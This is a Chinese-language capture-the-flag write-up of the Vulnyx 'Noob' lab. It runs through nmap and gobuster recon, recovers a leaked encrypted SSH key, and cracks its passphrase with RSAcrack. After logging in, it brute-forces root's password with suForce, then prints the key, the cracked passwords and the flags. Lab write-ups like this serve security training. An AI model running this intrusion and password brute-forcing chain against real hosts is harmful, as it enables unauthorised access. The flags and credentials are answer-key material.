Vlx_Noob

靶机来源:https://vulnyx.com/

难度:Low

一、信息收集

1、主机探测

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(root㉿kali)-[/miaosec]
└─# nmap -sn 192.168.2.0/24              
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-14 09:49 CST
Nmap scan report for 192.168.2.1
Host is up (0.0021s latency).
MAC Address: 0A:00:27:00:00:07 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.0014s latency).
MAC Address: 08:00:27:92:7B:DF (Oracle VirtualBox virtual NIC)
Nmap scan report for new.dsz (192.168.2.43)
Host is up (0.0018s latency).
MAC Address: 08:00:27:14:3B:3A (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.09 seconds

靶机IP:192.168.2.43

2、端口扫描

1.全端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
┌──(root㉿kali)-[/miaosec]
└─# nmap --min-rate 10000 -p- 192.168.2.43                        
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-14 09:49 CST
Nmap scan report for new.dsz (192.168.2.43)
Host is up (0.00023s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:14:3B:3A (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 4.33 seconds

开放端口:22、80

2.详细信息扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
┌──(root㉿kali)-[/miaosec]
└─# nmap --min-rate 10000 -sT -sV -sC -O -p22,80 192.168.2.43 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-14 09:50 CST
Nmap scan report for new.dsz (192.168.2.43)
Host is up (0.0029s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)
|   256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)
|_  256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519)
80/tcp open  http    Apache httpd 2.4.56 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.56 (Debian)
MAC Address: 08:00:27:14:3B:3A (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.87 seconds

3.udp扫描

1
2
3
4
5
6
7
8
9
10
┌──(root㉿kali)-[/miaosec]
└─# nmap -sU --top-ports 100 192.168.2.43                    
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-14 09:52 CST
Nmap scan report for new.dsz (192.168.2.43)
Host is up (0.0012s latency).
All 100 scanned ports on new.dsz (192.168.2.43) are in ignored states.
Not shown: 53 closed udp ports (port-unreach), 47 open|filtered udp ports (no-response)
MAC Address: 08:00:27:14:3B:3A (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 49.54 seconds

二、WEB渗透

1、80网站

访问80端口,是Apache的默认页面 img

2、目录扫描

进行目录扫描

1
2
3
4
5
┌──(root㉿kali)-[/miaosec]
└─# gobuster dir -u http://192.168.2.43 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt,html,bak,md,db,js
...
/notes.txt            (Status: 200) [Size: 101]
...

访问notes.txt

1
2
3
4
5
6
7
┌──(root㉿kali)-[/miaosec]
└─# curl http://192.168.2.43/notes.txt
Fuck!

configuring SSH, I closed the editor by mistake and lost the key.. I can't find it

Diego

提示我们误将在编辑器中配置SSHdiego服务时关闭了,故可能存在ssh密钥缓存

3、临时文件目录扫描

1
2
3
4
5
6
┌──(root㉿kali)-[/miaosec]
└─# gobuster dir -u http://192.168.2.43 -w /usr/share/wordlists/dirb/common.txt -x bak,swp,tmp 
...
/id_rsa.swp           (Status: 200) [Size: 1743]
/index.html           (Status: 200) [Size: 10701]
...

找到id_rsa.swp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
┌──(root㉿kali)-[/tmp]
└─# cat id_rsa.swp                                             
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,5FB6DAB10833FB47

wyx0cnQnbD8irngLK6O52ClihBJPTKpjbQdqfB/AbIlyBCtm0AAib5Ej6VH9UMKy
FEFFemgiN2Wpxz3vPq6RI470BL+2BXbqhO3yNGwCkmHiStWQ8AlhXdh+z5cP8xoT
/3wTzXQsCMT2sCwvOs2QoKXTEzd8RF6SqjD2ambSkzZMCoo+dYHw4+2PnbUiXr3s
VSJsNxiouNu9uUT+MpvKyfvpW1jfE/lcyEYWHFhllIjyLYqmZDEumhfMu3Q2ji7c
XjAuzgapP11+uSnzFLQo8DrSdmhmYJV+xYpKBiQLAZcsiwTzuyYz0CQhpVa7z9P6
rob+yzlwG/7erGjDb6wg/UJwDcjPn+T9mPrU0fZDF13iJNG9sE0OG80hd6QwPiFJ
mlW++fLEtYTC+wv56QiGPlDZn4yDziABRnRxYjHJnPvxZjpZFq+1hMc6OEyIst02
fN/C0Q6oZtYdLleb15/jhlX1gKH70L8a8ecmgmmYaS31kMdHwZinU8wHl4Pcrf88
We71WkrkFkuPlF2afLDehYSlJxeT2cJ+H9lGkEsfGL4JtoT4uyjsREiqC0Q3BlsD
7fA4t4k7quxq9q6A5YJQc8pDKWO6f/poDTBHxeK4Urzwh4gMjLWxuImTpvG3mydp
Z8FdMgO/AyWa7Zq8DACEZoDxY6IWwwJ2vcaSremVBlA2vkQqZsG1Df2wDlfF+/P0
PMUNDDshRx92IHnzinM+AM3HilxDKV1vwjMjOJJH1blb1sNIHUT85P90Ewn5NEgE
ACl3fK/GkOU9KX0gGfkXwmWqrFkeliTEhGpi7s9j5YSvbq4fTszxqt8UuM/gdTUf
7GPJCOe/h3oudznytN6j2N6Z15SOGG2j8+xUfgAbW/+IxuCdpVqGWESkTJ7VfbxR
sKq3U1AUm+fLrQ6T9+NIzHRuqts9EXUMkXjoDIsY56ZYU04oOezuvDzgy/GxVNeC
eLDEo8/IY77HjoQxP3a+AfEyFH26x4JVgF43RXSqdyGL62IqAjmdNnRM91XZJUY7
nNsnTyYDmQaAZLY2KQfiYQkUV4q6sGVmcwzM+ryTAIQJlmYbo+OCKZgg4ZxOjofM
axd1DhxHbC/Y2CdkB60N9fJdQSKqYjGPK7dDI/JBevrphp+p6ZMDeP8oERryI8mX
aLdVMWV3VcvR6Vs/x2/ogI6EBn1CA2VOooTtV77zKRHDcDlU2HmiOSRNCXvwLDi0
qPLJRBwSE+wwMgDAKsU+Yv5itHq7pCkeqzMbvD6E5kFyvHhXi2YmYj4EYPiz8OYP
dyw7aG8b8tICRoYRN3FjFH5kh1/PXWOf1TlbdHmYE6vNgpoBmrNNfEzT6zeZxKXj
ExJHVZ3v9+7rhPXUZasONogZrm9w9fOPSMFrVdNZsrZsrWAukfG+wCKVdzy5vAvL
bHefHgEM5ZC8v4+Kg7nsFjM6DHWn5y+lFb15TYptWApZ7+2UWHGhu3a1lZvxSFGi
iwEjHBlsCo8IBsRIRKrae6RpuQhVlm1fRZqf0yFuv2W2KjUGMqCinxn/7o7rY/d3
l5Ziei4zwDkhZTWB+iZtaJ7aSUJ6CKJb5sTta7HqSSgutGAX80Ao3g==
-----END RSA PRIVATE KEY-----

发现这个私钥是加密Proc-Type: 4,ENCRYPTED的,需要密码才能使用

4、RSAcrack

进行暴力破解,找到密码为sandiego

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
┌──(root㉿kali)-[/miaosec/RSAcrack-main]
└─# ./RSAcrack -k /tmp/id -w /tools/wordlist/pass.txt 

 ╭━━━┳━━━┳━━━╮          ╭╮  
 ┃╭━╮┃╭━╮┃╭━╮┃          ┃┃  
 ┃╰━╯┃╰━━┫┃ ┃┣━━┳━┳━━┳━━┫┃╭╮
 ┃╭╮╭┻━━╮┃╰━╯┃╭━┫╭┫╭╮┃╭━┫╰╯╯
 ┃┃┃╰┫╰━╯┃╭━╮┃╰━┫┃┃╭╮┃╰━┫╭╮╮
 ╰╯╰━┻━━━┻╯ ╰┻━━┻╯╰╯╰┻━━┻╯╰╯
─────────────────────────────
 code: d4t4s3c   ver: v1.0.0
─────────────────────────────
[i] Cracking | /tmp/id
[i] Wordlist | /tools/wordlist/pass.txt
[*] Status   | 2087/10003/20%/sandiego
[+] Password | sandiego
─────────────────────────────

三、GET-SHELL

根据获取到的私钥以及密码,尝试进行SSH登录

1
2
3
4
5
6
7
8
9
┌──(root㉿kali)-[/tmp]
└─# ssh diego@192.168.2.43 -i id                            
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.2.43' (ED25519) to the list of known hosts.
Enter passphrase for key 'id': 
Linux noob 5.10.0-23-amd64 #1 SMP Debian 5.10.179-1 (2023-05-12) x86_64
Last login: Mon May 22 13:56:42 2023 from 192.168.1.10
diego@noob:~$ id
uid=1000(diego) gid=1000(diego) grupos=1000(diego)

四、权限提升

查看sudo -l

1
2
diego@noob:/$ sudo -l
-bash: sudo: orden no encontrada

查看定时任务、suid权限的文件、可写的文件都没有相关的信息

尝试爆破

1
2
3
4
5
6
7
8
9
10
11
12
13
14
diego@noob:/tmp$ ./suForce -u root -w pass.txt 
            _____                          
 ___ _   _ |  ___|__  _ __ ___ ___   
/ __| | | || |_ / _ \| '__/ __/ _ \ 
\__ \ |_| ||  _| (_) | | | (_|  __/  
|___/\__,_||_|  \___/|_|  \___\___|  
───────────────────────────────────
 code: d4t4s3c     version: v1.0.0
───────────────────────────────────
🎯 Username | root
📖 Wordlist | pass.txt
🔎 Status   | 2402/10003/24%/rootbeer
💥 Password | rootbeer
───────────────────────────────────

找到密码rootbeer

获取root权限

1
2
3
4
diego@noob:/tmp$ su root
Contraseña: 
root@noob:/tmp# id
uid=0(root) gid=0(root) grupos=0(root)

五、查看FLAG

1
2
3
root@noob:/tmp# cat /root/root.txt /home/diego/user.txt 
5d12e0bbb9e9b426ec9e945d440d8288
cd02a5a828de0812a6e3552ec8740a5e
Vulnyx
#SSH_diego #RSAcrack #SuForce
Vlx_Noob
http://miao-sec.github.io/Vulnyx/Vlx_Noob/
作者
Miao
发布于
2026年1月14日
许可协议
BY-MIAO